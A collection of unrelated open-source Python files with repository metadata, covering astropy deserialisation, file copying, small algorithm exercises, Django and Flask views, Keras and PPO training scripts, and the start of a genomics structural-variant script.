/astropy/wcs/wcsapi/utils.py
53379b993dc646aa57a45e54f4c0a676d7dfff9e
[ "BSD-3-Clause" ]
permissive
eteq/astropy
e728384624d0c5d497bc5561f303f2a1bc4582ff
6a4f41e22bd8bc6a0031415c771aa8f9d744e34e
refs/heads/staging
2023-09-01T08:51:08.804445
2021-12-07T00:51:15
2021-12-07T00:51:15
2,103,466
1
1
BSD-3-Clause
2018-12-20T19:56:55
2011-07-25T21:02:57
Python
UTF-8
Python
false
false
677
py
import importlib def deserialize_class(tpl, construct=True): """ Deserialize classes recursively. """ if not isinstance(tpl, tuple) or len(tpl) != 3: raise ValueError("Expected a tuple of three values") module, klass = tpl[0].rsplit('.', 1) module = importlib.import_module(module) klass = getattr(module, klass) args = tuple([deserialize_class(arg) if isinstance(arg, tuple) else arg for arg in tpl[1]]) kwargs = dict((key, deserialize_class(val)) if isinstance(val, tuple) else (key, val) for (key, val) in tpl[2].items()) if construct: return klass(*args, **kwargs) else: return klass, args, kwargs
[ "thomas.robitaille@gmail.com" ]
thomas.robitaille@gmail.com
3c6e5cf00966edb4796301a929fbbc97791f5cd9
4d387b596167e6636341bae268b2e582b22d5ff8
/scripts/Meta/Copy_Files.py
86fb8385b7b207de12f8ea0d64c6141be3e8cd91
[]
no_license
tanmayshankar/Visualize_Primitives
f3357b1da95759567bf3abf4bf592cfddef5211e
58f346208cc89265219295ecd5b617e1b8c9dd97
refs/heads/master
2021-01-19T13:52:57.156669
2017-03-26T23:01:58
2017-03-26T23:01:58
82,424,203
0
0
null
null
null
null
UTF-8
Python
false
false
646
py
#!/usr/bin/env python import os import subprocess import sys import shutil import time import signal import numpy as npy # FRCNN_DIR = "/home/tanmay/Code/py-faster-rcnn/tools" # CPM_DIR = "/home/tanmay/Code/Realtime_Multi-Person_Pose_Estimation/testing/python" # INTERP_DIR = "/home/tanmay/Code/Meta_Scripts" IMG_DIR = "/home/tanmay/Code/Grid_Demo/Grid_Demo/" LOC_DIR = "/home/tanmay/catkin_ws/src/Visualize_Primitives/Data/K2_Demos/Grid_Demo" command = "scp tanmay@128.2.194.56:~/Code/Grid_Demo/Grid_Demo/D{0}/Interpolated_Depth_*.png D{0}/" for i in range(1,11): p = subprocess.Popen(command.format(i),shell=True) p.wait() time.sleep(2)
[ "tanmay.shankar@gmail.com" ]
tanmay.shankar@gmail.com
38d791179d75775bfc94f3b94fcadf5825a1ce61
642b7138da231474154a83c2dc3b4a2a42eb441b
/dp/subset_sum_divisible_by_num.py
e26d12eb1e480aa628c9042d7900f4e49be48bc5
[]
no_license
somanshu/python-pr
15465ed7182413591c709f9978420f6a16c9db91
7bfee6fc2a8340ba3e343f991a1da5bdb4ae9cb2
refs/heads/master
2020-07-02T17:21:37.132495
2019-08-22T08:04:11
2019-08-22T08:04:11
201,602,731
0
0
null
null
null
null
UTF-8
Python
false
false
494
py
# Given a set of non-negative distinct integers, and a value m, determine if # there is a subset of the given set with sum divisible by m. def get_subset(s, index, m, currentSum): if currentSum > 0 and currentSum % m == 0: return True if index < 0: return False return get_subset(s, index - 1, m, currentSum) or get_subset(s, index - 1, m, currentSum + s[index]) s = [3, 1, 7, 5] # s = [1, 6] m = 6 # m = 5 index = len(s) - 1 print(get_subset(s, index, m, 0))
[ "somanshu@logos.social" ]
somanshu@logos.social
d3217f0ee0a2b85006978be11d3a0ae29fb0ac17
84a1f9d626828b6ecaee4ef037081f4d8750a990
/编程/程序/十进制转二进制.py
06d8e39924ca9cd5220c784d369d7cdda9e95e6b
[]
no_license
dujiaojingyu/Personal-programming-exercises
5a8f001efa038a0cb3b6d0aa10e06ad2f933fe04
72a432c22b52cae3749e2c18cc4244bd5e831f64
refs/heads/master
2020-03-25T17:36:40.734446
2018-10-01T01:47:36
2018-10-01T01:47:36
143,986,099
1
0
null
null
null
null
UTF-8
Python
false
false
236
py
def Dec2Bin(dec): temp = [] result = ''#字符串 while dec: quo = dec % 2 dec = dec // 2 temp.append(quo) while temp: result += str(temp.pop()) return result print(Dec2Bin(62))
[ "34296128+dujiaojingyu@users.noreply.github.com" ]
34296128+dujiaojingyu@users.noreply.github.com
dc4917189b065071bb39984413668e2ac2c859f5
793913495349a2a53565c9238915ff928995b555
/django-easyvisa/english_page/views.py
a3028e1c80e00cc3317da7ef9721274453469c6d
[]
no_license
Naumov1889/django_easyvisa
48ff9f56569e5950dbb700159c2a4b7515d87413
8c81f9e37ef4c6f44ad1f5aef3d00c136ef7bc40
refs/heads/master
2023-04-09T07:26:38.432411
2021-04-03T09:16:43
2021-04-03T09:16:43
277,068,342
0
0
null
2021-04-03T09:16:44
2020-07-04T08:15:02
JavaScript
UTF-8
Python
false
false
235
py
from django.shortcuts import render from english_page.models import EnglishPrice def english_page(request): prices = EnglishPrice.objects.all().first() return render(request, 'english_page/english.html', {'prices': prices})
[ "144112passgitword" ]
144112passgitword
35e0daa8466311b20ce6fa92c764d84d2f973a23
8acffb8c4ddca5bfef910e58d3faa0e4de83fce8
/ml-flask/Lib/site-packages/networkx/generators/tests/test_duplication.py
6f0c7bba2b4170d7128591683cf7b26ad6244ece
[ "MIT" ]
permissive
YaminiHP/SimilitudeApp
8cbde52caec3c19d5fa73508fc005f38f79b8418
005c59894d8788c97be16ec420c0a43aaec99b80
refs/heads/master
2023-06-27T00:03:00.404080
2021-07-25T17:51:27
2021-07-25T17:51:27
389,390,951
0
0
null
null
null
null
UTF-8
Python
false
false
129
py
version https://git-lfs.github.com/spec/v1 oid sha256:99d43639bea0ce795ffc6fcf063a2bc982ee6f2e94b736c4b58c242837a71094 size 1945
[ "yamprakash130@gmail.com" ]
yamprakash130@gmail.com
9406c2bdaf5dddc7a4148100cbd8ef8babd66090
3ee1bb0d0acfa5c412b37365a4564f0df1c093fb
/keras/keras36_hist5_diabets.py
4fabc80b4372746cb9370aec93a29547b2966c07
[]
no_license
moileehyeji/Study
3a20bf0d74e1faec7a2a5981c1c7e7861c08c073
188843c6415a4c546fdf6648400d072359d1a22b
refs/heads/main
2023-04-18T02:30:15.810749
2021-05-04T08:43:53
2021-05-04T08:43:53
324,901,835
3
0
null
null
null
null
UTF-8
Python
false
false
2,406
py
# hist를 이용하여 그래프를 그리시오 # loss, val_loss import numpy as np #1. 데이터 from sklearn.datasets import load_diabetes dataset =load_diabetes() x = dataset.data y = dataset.target print(x.shape) print(y.shape) from sklearn.model_selection import train_test_split x_train, x_test, y_train, y_test = train_test_split(x, y, train_size = 0.8, shuffle = True, random_state = 66) x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, train_size = 0.5, shuffle = False, random_state = 30) #데이터 전처리3 from sklearn.preprocessing import MinMaxScaler scaler = MinMaxScaler() scaler.fit(x_train) x_train = scaler.transform(x_train) x_test = scaler.transform(x_test) x_val = scaler.transform(x_val) #2.모델구성 from tensorflow.keras.models import Sequential, Model from tensorflow.keras.layers import Dense, Input input1 = Input(shape=(10,)) dense = Dense(50, activation='linear')(input1) dense = Dense(90, activation='linear')(dense) # dense = Dense(100, activation='linear')(dense) # dense = Dense(100, activation='linear')(dense) # dense = Dense(100, activation='linear')(dense) dense = Dense(80, activation='linear')(dense) dense = Dense(80, activation='linear')(dense) dense = Dense(80, activation='linear')(dense) dense = Dense(20, activation='linear')(dense) output = Dense(1)(dense) model = Model(inputs=input1, outputs=output) #3. 컴파일, 훈련 from tensorflow.keras.callbacks import EarlyStopping early_stopping = EarlyStopping(monitor='loss', patience=20, mode='auto') model.compile(loss='mse', optimizer='adam', metrics=['mae']) hist = model.fit(x_train, y_train, epochs=2000, batch_size=50, validation_data = (x_val, y_val), callbacks=[early_stopping]) # 그래프 import matplotlib.pyplot as plt plt.plot(hist.history['loss']) plt.plot(hist.history['val_loss']) plt.title('loss') plt.ylabel('epochs') plt.xlabel('loss') plt.legend(['loss', 'val loss']) plt.show() # #4. 평가, 예측 # loss, mae = model.evaluate(x_test, y_test, batch_size=10) # print('loss, mae : ', loss, mae) # y_predict = model.predict(x_test) # from sklearn.metrics import mean_squared_error, r2_score # def RMSE (y_test, y_predict): # return(np.sqrt(mean_squared_error(y_test, y_predict))) # print('RMSE : ', RMSE(y_test, y_predict)) # print('R2 : ', r2_score(y_test, y_predict))
[ "noreply@github.com" ]
moileehyeji.noreply@github.com
9757613bcff8082143262d20e2291b9e7dc4f47c
3b3585bb12becfe72af03814cec645b0c8e6c779
/satchmo/fulfilment/modules/six/config.py
5843693df8d189a95a02372e005d2daf69ad4a29
[ "BSD-2-Clause" ]
permissive
juderino/jelly-roll
aac548073487511c5b935d9fb20c5a995c665b9b
ccac91bf3aab06fec4f83a7f9eabfa22d41b922a
refs/heads/master
2021-01-18T21:04:15.232998
2015-07-21T20:35:26
2015-07-21T20:35:26
36,597,803
0
0
null
2015-05-31T10:16:21
2015-05-31T10:16:21
null
UTF-8
Python
false
false
1,680
py
from django.utils.translation import ugettext_lazy as _ from satchmo.configuration import ( ConfigurationGroup, config_register_list, StringValue, BooleanValue, ) from satchmo.fulfilment.config import ACTIVE_FULILMENT_HOUSE import logging log = logging.getLogger(__name__) ACTIVE_FULILMENT_HOUSE.add_choice(('satchmo.fulfilment.modules.six', _('Six'))) FULILMENT_HOUSE = ConfigurationGroup( 'satchmo.fulfilment.modules.six', _('Six Fulfilment Settings'), requires=ACTIVE_FULILMENT_HOUSE, ordering=101 ) config_register_list( StringValue( FULILMENT_HOUSE, 'API_KEY', description=_("API Key"), help_text=_("Client's API key, provided by fulfiller."), default=u"" ), BooleanValue( FULILMENT_HOUSE, 'TEST_MODE', description=_("Test mode"), help_text=_("Test identifier, must equal false for order to be processed."), default=True ), StringValue( FULILMENT_HOUSE, 'URL', description=_("API URL"), help_text=_("URL of fulfillers API."), default=u"https://[client].sixworks.co.uk/api/1/" ), BooleanValue( FULILMENT_HOUSE, 'UPDATE_STOCK', description=_("Update Stock"), help_text=_("Update stock based on the fulfilment houses stock levels."), default=True ), BooleanValue( FULILMENT_HOUSE, 'ALLOW_PREORDER', description=_("Allow Preorder"), help_text=_("If true, permits acceptance of orders which contain lines currently out of stock. Disables Out-Of-Stock feedback in API response."), default=False ), )
[ "tony@ynottony.net" ]
tony@ynottony.net
11bcf91fc23f175de6c1f7766a58c9558e8198ab
29f6b4804f06b8aabccd56fd122b54e4d556c59a
/CodeAnalysis/SourceMeter_Interface/SourceMeter-8.2.0-x64-linux/Python/Demo/ceilometer/ceilometer/tests/storage/test_impl_log.py
a12a4c4a5e8878baa8e02622ebde5d5722f131db
[ "Apache-2.0" ]
permissive
obahy/Susereum
6ef6ae331c7c8f91d64177db97e0c344f62783fa
56e20c1777e0c938ac42bd8056f84af9e0b76e46
refs/heads/master
2020-03-27T11:52:28.424277
2018-12-12T02:53:47
2018-12-12T02:53:47
146,511,286
3
2
Apache-2.0
2018-12-05T01:34:17
2018-08-28T21:57:59
HTML
UTF-8
Python
false
false
1,134
py
# # Copyright 2012 New Dream Network, LLC (DreamHost) # # Author: Doug Hellmann <doug.hellmann@dreamhost.com> # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for ceilometer/storage/impl_log.py """ from oslotest import base from ceilometer.storage import impl_log class ConnectionTest(base.BaseTestCase): def test_get_connection(self): conn = impl_log.Connection(None) conn.record_metering_data({'counter_name': 'test', 'resource_id': __name__, 'counter_volume': 1, })
[ "abelgomezr45@gmail.com" ]
abelgomezr45@gmail.com
0088554cddbce79223fbc75f4ed10baaafd29148
50de76eb887892c2085e1aa898987962a5d75380
/_8_TensorFlowBasics/Kaggle/MNIST_example/MyVersion.py
303758586192ffed1c2223ce19a995b6a0619cd1
[]
no_license
cyrsis/TensorflowPY36CPU
cac423252e0da98038388cf95a3f0b4e62d1a888
6ada50adf63078ba28464c59808234bca3fcc9b7
refs/heads/master
2023-06-26T06:57:00.836225
2021-01-30T04:37:35
2021-01-30T04:37:35
114,089,170
5
2
null
2023-05-25T17:08:43
2017-12-13T07:33:57
Jupyter Notebook
UTF-8
Python
false
false
3,555
py
import pandas as pd import numpy as np import matplotlib.pyplot as plt import matplotlib.image as mpimg import seaborn as sns np.random.seed(2) from sklearn.model_selection import train_test_split from sklearn.metrics import confusion_matrix import itertools from keras.utils.np_utils import to_categorical # convert to one-hot-encoding from keras.models import Sequential from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D from keras.optimizers import Adam , RMSprop from keras.preprocessing.image import ImageDataGenerator from keras.callbacks import ReduceLROnPlateau train_data = pd.read_csv("train.csv") test = pd.read_csv("test.csv") X_train = train_data.drop("label", axis=1) Y_train = train_data["label"] X_train.isnull().any().describe() test.isnull().any().describe() # normalize the data X_train = X_train / 255.0 test = test / 255.0 X_train = X_train.values.reshape(-1, 28, 28, 1) test = test.values.reshape(-1, 28, 28, 1) # one_hot on y Y_train = to_categorical(Y_train, num_classes=10) # Splite the data into 2 random_seed = 2 X_train, X_value, Y_train, Y_value = train_test_split(X_train, Y_train, test_size=0.2, random_state=random_seed) g = plt.imshow(X_train[0][:, :, 0]) # Layer 1 = 2Conv 1 Max 1 Dropout model = Sequential() model.add(Conv2D(filters=32, kernel_size=(5, 5), padding='same', activation='relu', input_shape=(28, 28, 1))) model.add(Conv2D(filters=32, kernel_size=(5, 5), padding='same', activation='relu')) model.add(MaxPool2D(pool_size=(2, 2))) model.add(Dropout(0.25)) # layer 2 = 2Conv 1 Max 1 Dropout model.add(Conv2D(filters=64, kernel_size=(3, 3), padding='same', activation='relu')) model.add(Conv2D(filters=64, kernel_size=(3, 3), padding='same', activation='relu')) model.add(MaxPool2D(pool_size=(2, 2), strides=(2, 2))) model.add(Dropout(0.25)) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(10, activation="softmax")) model.summary() optimizer = Adam(lr=0.001) model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"]) epochs = 8000 batch_size = 100 datagen = ImageDataGenerator( featurewise_center=False, # set input mean to 0 over the dataset samplewise_center=False, # set each sample mean to 0 featurewise_std_normalization=False, # divide inputs by std of the dataset samplewise_std_normalization=False, # divide each input by its std zca_whitening=False, # apply ZCA whitening rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180) zoom_range=0.1, # Randomly zoom image width_shift_range=0.1, # randomly shift images horizontally (fraction of total width) height_shift_range=0.1, # randomly shift images vertically (fraction of total height) horizontal_flip=False, # randomly flip images vertical_flip=False) # randomly flip images datagen.fit(X_train) learning_rate_reduction = ReduceLROnPlateau(monitor='val_acc', patience=3, verbose=1, factor=0.5, min_lr=0.00001) history = model.fit_generator(datagen.flow(X_train, Y_train, batch_size=batch_size), epochs=epochs, validation_data=(X_value, Y_value), verbose=2, steps_per_epoch=X_train.shape[0] // batch_size , callbacks=[learning_rate_reduction]) model.save('kaggleMnist.h5')
[ "em3888@gmail.com" ]
em3888@gmail.com
631df51128d1ead7ea74a4165ad84d1ae6ba2c21
113b962bd5e2eb770067bd374a15dfe8a1c2d09f
/py_scripts/ALC_Classify_mem.py
ac329f05c8175852db002aa7f765e64b208a2500
[]
no_license
aungthurhahein/biotech_script
ecce51950bcef69405843da12ece2f84ea5541d6
2fda699343e6c46543fa1df2412c8ca2f2622cda
refs/heads/master
2020-12-24T06:20:13.028141
2016-07-06T15:23:34
2016-07-06T15:23:34
25,574,741
5
0
null
null
null
null
UTF-8
Python
false
false
1,280
py
#! /usr/bin/env/ python """ # # usage: # output: # Dev: __author__ = 'aung' # Date: """ import sys A_id = sys.argv[1] # A L_id = sys.argv[2] # L C_id = sys.argv[3] # C Cu_id = sys.argv[4] # C Unmap cluster_file = sys.argv[5] # cluster parsed file open_Aid = open(A_id, 'r') open_Lid = open(L_id, 'r') open_Cid = open(C_id, 'r') open_Cuid = open(Cu_id, 'r') open_cluster = open(cluster_file, 'r') A_id_list = [] L_id_list = [] C_id_list = [] Cu_id_list = [] clst_list = [] for id1 in open_Aid: A_id_list.append(id1.strip()) for id2 in open_Lid: L_id_list.append(id2.strip()) for id3 in open_Cid: C_id_list.append(id3.strip()) for id4 in open_Cuid: Cu_id_list.append(id4.strip()) for cluster in open_cluster: clst_list.append(cluster.strip()) for x in clst_list: x_split = x.split('\t') A_count = 0 L_count = 0 C_count = 0 Cu_count = 0 for mem in x_split[1:]: if mem.strip() in A_id_list: A_count += 1 elif mem.strip() in L_id_list: L_count += 1 elif mem.strip() in C_id_list: C_count += 1 elif mem.strip() in Cu_id_list: Cu_count += 1 print x_split[0] + '\t' + str(A_count) +'\t' + str(L_count) +'\t' + str(C_count) +'\t' + str(Cu_count)
[ "aungthurhahein@gmail.com" ]
aungthurhahein@gmail.com
068c7cd5bd637d350ce9bd048c76e37c66724ddc
84617010027b08e65412b0e187bc0612a59cfbc7
/nomenklatura/views/sessions.py
52b22af40c4de8eb7066b51ea550ebcf98409300
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
gabelula/nomenklatura
16d52def8bb1c0dbc5a6aa386336366de31ffd79
eae335a44ef6bb08728083d4d10386f3a9e16def
refs/heads/master
2020-12-02T15:07:10.350344
2013-12-02T11:35:02
2013-12-02T11:35:02
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,968
py
import requests from flask import url_for, session, Blueprint, redirect from flask import request from flask.ext.utils.serialization import jsonify from nomenklatura import authz from nomenklatura.core import db, github from nomenklatura.model import Account, Dataset section = Blueprint('sessions', __name__) @section.route('/sessions') def status(): return jsonify({ 'logged_in': authz.logged_in(), 'api_key': request.account.api_key if authz.logged_in() else None, 'account': request.account }) @section.route('/sessions/authz') def get_authz(): permissions = {} dataset_name = request.args.get('dataset') if dataset_name is not None: dataset = Dataset.find(dataset_name) permissions[dataset_name] = { 'view': True, 'edit': authz.dataset_edit(dataset), 'manage': authz.dataset_manage(dataset) } return jsonify(permissions) @section.route('/sessions/login') def login(): callback=url_for('sessions.authorized', _external=True) return github.authorize(callback=callback) @section.route('/sessions/logout') def logout(): authz.require(authz.logged_in()) session.clear() #flash("You've been logged out.", "success") return redirect(url_for('index')) @section.route('/sessions/callback') @github.authorized_handler def authorized(resp): if not 'access_token' in resp: return redirect(url_for('index')) access_token = resp['access_token'] session['access_token'] = access_token, '' res = requests.get('https://api.github.com/user?access_token=%s' % access_token, verify=False) data = res.json() for k, v in data.items(): session[k] = v account = Account.by_github_id(data.get('id')) if account is None: account = Account.create(data) db.session.commit() #flash("Welcome back, %s." % account.login, "success") return redirect(url_for('index'))
[ "friedrich@pudo.org" ]
friedrich@pudo.org
2208cbadde363d62f16946fc23a172732d054aa5
b54eb04ec2de1dec11a7143c6b5049a1d031ddaf
/test/baselines/ppo1/pposgd_simple.py
8f4c641bc5bc34fd88a1303b2e9a5e4e895fff54
[]
no_license
Jerryxiaoyu/CR_CPG_RL
78c4c6e7539f08465b1f55125e04f982b1323bf2
69213cc48440ea66c42fbe3ace35163174686321
refs/heads/master
2020-03-28T12:11:51.491796
2018-09-14T04:32:33
2018-09-14T04:32:33
148,277,281
0
0
null
null
null
null
UTF-8
Python
false
false
9,514
py
from test.baselines.common import Dataset, explained_variance, fmt_row, zipsame from test.baselines import logger import test.baselines.common.tf_util as U import tensorflow as tf, numpy as np import time from test.baselines.common.mpi_adam import MpiAdam from test.baselines.common.mpi_moments import mpi_moments from mpi4py import MPI from collections import deque def traj_segment_generator(pi, env, horizon, stochastic): t = 0 ac = env.action_space.sample() # not used, just so we have the datatype new = True # marks if we're on first timestep of an episode ob = env.reset() cur_ep_ret = 0 # return in current episode cur_ep_len = 0 # len of current episode ep_rets = [] # returns of completed episodes in this segment ep_lens = [] # lengths of ... # Initialize history arrays obs = np.array([ob for _ in range(horizon)]) rews = np.zeros(horizon, 'float32') vpreds = np.zeros(horizon, 'float32') news = np.zeros(horizon, 'int32') acs = np.array([ac for _ in range(horizon)]) prevacs = acs.copy() while True: prevac = ac ac, vpred = pi.act(stochastic, ob) # Slight weirdness here because we need value function at time T # before returning segment [0, T-1] so we get the correct # terminal value if t > 0 and t % horizon == 0: yield {"ob" : obs, "rew" : rews, "vpred" : vpreds, "new" : news, "ac" : acs, "prevac" : prevacs, "nextvpred": vpred * (1 - new), "ep_rets" : ep_rets, "ep_lens" : ep_lens} # Be careful!!! if you change the downstream algorithm to aggregate # several of these batches, then be sure to do a deepcopy ep_rets = [] ep_lens = [] i = t % horizon obs[i] = ob vpreds[i] = vpred news[i] = new acs[i] = ac prevacs[i] = prevac ob, rew, new, _ = env.step(ac) rews[i] = rew cur_ep_ret += rew cur_ep_len += 1 if new: ep_rets.append(cur_ep_ret) ep_lens.append(cur_ep_len) cur_ep_ret = 0 cur_ep_len = 0 ob = env.reset() t += 1 def add_vtarg_and_adv(seg, gamma, lam): """ Compute target value using TD(lambda) estimator, and advantage with GAE(lambda) """ new = np.append(seg["new"], 0) # last element is only used for last vtarg, but we already zeroed it if last new = 1 vpred = np.append(seg["vpred"], seg["nextvpred"]) T = len(seg["rew"]) seg["adv"] = gaelam = np.empty(T, 'float32') rew = seg["rew"] lastgaelam = 0 for t in reversed(range(T)): nonterminal = 1-new[t+1] delta = rew[t] + gamma * vpred[t+1] * nonterminal - vpred[t] gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam seg["tdlamret"] = seg["adv"] + seg["vpred"] def learn(env, policy_fn, *, timesteps_per_actorbatch, # timesteps per actor per update clip_param, entcoeff, # clipping parameter epsilon, entropy coeff optim_epochs, optim_stepsize, optim_batchsize,# optimization hypers gamma, lam, # advantage estimation max_timesteps=0, max_episodes=0, max_iters=0, max_seconds=0, # time constraint callback=None, # you can do anything in the callback, since it takes locals(), globals() adam_epsilon=1e-5, schedule='constant' # annealing for stepsize parameters (epsilon and adam) ): # Setup losses and stuff # ---------------------------------------- ob_space = env.observation_space ac_space = env.action_space pi = policy_fn("pi", ob_space, ac_space) # Construct network for new policy oldpi = policy_fn("oldpi", ob_space, ac_space) # Network for old policy atarg = tf.placeholder(dtype=tf.float32, shape=[None]) # Target advantage function (if applicable) ret = tf.placeholder(dtype=tf.float32, shape=[None]) # Empirical return lrmult = tf.placeholder(name='lrmult', dtype=tf.float32, shape=[]) # learning rate multiplier, updated with schedule clip_param = clip_param * lrmult # Annealed cliping parameter epislon ob = U.get_placeholder_cached(name="ob") ac = pi.pdtype.sample_placeholder([None]) kloldnew = oldpi.pd.kl(pi.pd) ent = pi.pd.entropy() meankl = tf.reduce_mean(kloldnew) meanent = tf.reduce_mean(ent) pol_entpen = (-entcoeff) * meanent ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # pnew / pold surr1 = ratio * atarg # surrogate from conservative policy iteration surr2 = tf.clip_by_value(ratio, 1.0 - clip_param, 1.0 + clip_param) * atarg # pol_surr = - tf.reduce_mean(tf.minimum(surr1, surr2)) # PPO's pessimistic surrogate (L^CLIP) vf_loss = tf.reduce_mean(tf.square(pi.vpred - ret)) total_loss = pol_surr + pol_entpen + vf_loss losses = [pol_surr, pol_entpen, vf_loss, meankl, meanent] loss_names = ["pol_surr", "pol_entpen", "vf_loss", "kl", "ent"] var_list = pi.get_trainable_variables() lossandgrad = U.function([ob, ac, atarg, ret, lrmult], losses + [U.flatgrad(total_loss, var_list)]) adam = MpiAdam(var_list, epsilon=adam_epsilon) assign_old_eq_new = U.function([],[], updates=[tf.assign(oldv, newv) for (oldv, newv) in zipsame(oldpi.get_variables(), pi.get_variables())]) compute_losses = U.function([ob, ac, atarg, ret, lrmult], losses) U.initialize() adam.sync() # Prepare for rollouts # ---------------------------------------- seg_gen = traj_segment_generator(pi, env, timesteps_per_actorbatch, stochastic=True) episodes_so_far = 0 timesteps_so_far = 0 iters_so_far = 0 tstart = time.time() lenbuffer = deque(maxlen=100) # rolling buffer for episode lengths rewbuffer = deque(maxlen=100) # rolling buffer for episode rewards assert sum([max_iters>0, max_timesteps>0, max_episodes>0, max_seconds>0])==1, "Only one time constraint permitted" while True: if callback: callback(locals(), globals()) if max_timesteps and timesteps_so_far >= max_timesteps: break elif max_episodes and episodes_so_far >= max_episodes: break elif max_iters and iters_so_far >= max_iters: break elif max_seconds and time.time() - tstart >= max_seconds: break if schedule == 'constant': cur_lrmult = 1.0 elif schedule == 'linear': cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0) else: raise NotImplementedError logger.log("********** Iteration %i ************"%iters_so_far) seg = seg_gen.__next__() add_vtarg_and_adv(seg, gamma, lam) # ob, ac, atarg, ret, td1ret = map(np.concatenate, (obs, acs, atargs, rets, td1rets)) ob, ac, atarg, tdlamret = seg["ob"], seg["ac"], seg["adv"], seg["tdlamret"] vpredbefore = seg["vpred"] # predicted value function before udpate atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate d = Dataset(dict(ob=ob, ac=ac, atarg=atarg, vtarg=tdlamret), shuffle=not pi.recurrent) optim_batchsize = optim_batchsize or ob.shape[0] if hasattr(pi, "ob_rms"): pi.ob_rms.update(ob) # update running mean/std for policy assign_old_eq_new() # set old parameter values to new parameter values logger.log("Optimizing...") logger.log(fmt_row(13, loss_names)) # Here we do a bunch of optimization epochs over the data for _ in range(optim_epochs): losses = [] # list of tuples, each of which gives the loss for a minibatch for batch in d.iterate_once(optim_batchsize): *newlosses, g = lossandgrad(batch["ob"], batch["ac"], batch["atarg"], batch["vtarg"], cur_lrmult) adam.update(g, optim_stepsize * cur_lrmult) losses.append(newlosses) logger.log(fmt_row(13, np.mean(losses, axis=0))) logger.log("Evaluating losses...") losses = [] for batch in d.iterate_once(optim_batchsize): newlosses = compute_losses(batch["ob"], batch["ac"], batch["atarg"], batch["vtarg"], cur_lrmult) losses.append(newlosses) meanlosses,_,_ = mpi_moments(losses, axis=0) logger.log(fmt_row(13, meanlosses)) for (lossval, name) in zipsame(meanlosses, loss_names): logger.record_tabular("loss_"+name, lossval) logger.record_tabular("ev_tdlam_before", explained_variance(vpredbefore, tdlamret)) lrlocal = (seg["ep_lens"], seg["ep_rets"]) # local values listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples lens, rews = map(flatten_lists, zip(*listoflrpairs)) lenbuffer.extend(lens) rewbuffer.extend(rews) logger.record_tabular("EpLenMean", np.mean(lenbuffer)) logger.record_tabular("EpRewMean", np.mean(rewbuffer)) logger.record_tabular("EpThisIter", len(lens)) episodes_so_far += len(lens) timesteps_so_far += sum(lens) iters_so_far += 1 logger.record_tabular("EpisodesSoFar", episodes_so_far) logger.record_tabular("TimestepsSoFar", timesteps_so_far) logger.record_tabular("TimeElapsed", time.time() - tstart) if MPI.COMM_WORLD.Get_rank()==0: logger.dump_tabular() def flatten_lists(listoflists): return [el for list_ in listoflists for el in list_]
[ "drl@wjy.com" ]
drl@wjy.com
c71e76456021d181e3109d58483b2b6cb52826cc
811e4542f6728e2f3de98fc227f9f4a111d4eb1e
/templates/topics/math/factorization.py
4c5332d9ce120a59f4ac95ff1464c5f004608320
[]
no_license
Alfred-Walker/ppst
ab2902f04a73048f73b50d3c79d9e80cd257a985
8685d0ca7e89be34372a7d2673e21abb77bb3778
refs/heads/master
2021-01-04T05:07:08.813035
2020-02-19T02:35:07
2020-02-19T02:35:07
240,400,000
0
0
null
null
null
null
UTF-8
Python
false
false
816
py
"""factorization examples""" class PrimeFactorization: @staticmethod def factorization(number): ret = [] for i in range(2, int(number ** 0.5) + 1): while number % i == 0: ret.append(i) number //= i if number > 1: ret.append(number) return ret prime_factors = PrimeFactorization.factorization(32) print(prime_factors) # >>> [2, 2, 2, 2, 2] prime_factors = PrimeFactorization.factorization(15) print(prime_factors) # >>> [3, 5] class Practice: @staticmethod def factorization(num): ret = [] for i in range(2, int(num ** 0.5) + 1): while num % i == 0: ret.append(i) num //= i if num >= 2: ret.append(num) return ret
[ "studio.alfred.walker@gmail.com" ]
studio.alfred.walker@gmail.com
52460ba2ae00e285614d14e7ba0f7598278c93fb
406bf29e4cfc59bc2cc6005813e4a63065c642bb
/jhyouk_universal_filter/13_SV/Delly_annotation_scripts/06.07.count_frag_find_newBP.py
c222cee64e94a9ee3a7e529a296aa1a6b0011040
[]
no_license
leehs96/Emergency_backup
630c5efbe17f3175851ee80ef6dde72f5f613fe7
9bc30b7a5eda03ac207b16f83d93559a5637ac19
refs/heads/main
2023-02-10T11:43:40.172101
2021-01-05T06:10:33
2021-01-05T06:10:33
326,903,545
0
0
null
null
null
null
UTF-8
Python
false
false
18,062
py
#Arg1: sv file #Arg2: tumor bam #Arg3: normal bam #190226 line427 change '=' inserted import sys,pysam, collections, itertools print('### SVvaf new BP') print(sys.argv[1]) sv_file=open(sys.argv[1]) #CHR1 POS1 CHR2 POS2 MH Terminal SVtype t_file=pysam.AlignmentFile(sys.argv[2],'rb') #Cancer bam n_file=pysam.AlignmentFile(sys.argv[3],'rb') #Normal bam out_file=open(sys.argv[1]+'.SVvaf','w') fors=700; bacs=5 # search range for pairread counting # You can adjust these values. iscut=700 # insert size cut for call reference pair # You can adjust this value. shortDco=500 sc_co=5 # number of bases which is used to differentiate discordant soft-clipping sv_line=sv_file.readline().strip() #Assign the column number starting from 1 c_chr1=15 c_pos1=16 c_chr2=17 c_pos2=18 c_ter=20 # e.g. 3to5, 5to3, 3to3, etc. c_type=21 # e.g. DEL, TRA, DUP, INV c_chr1 -=1;c_pos1-=1;c_chr2-=1;c_pos2-=1;c_ter-=1;c_type-=1 def make_cigartuple(cigarstring): cg_num=len(cigarstring) lt='' cigar_tuple_list=[] for n in range(0,cg_num): try: lt = lt+str(int(cigarstring[n])) 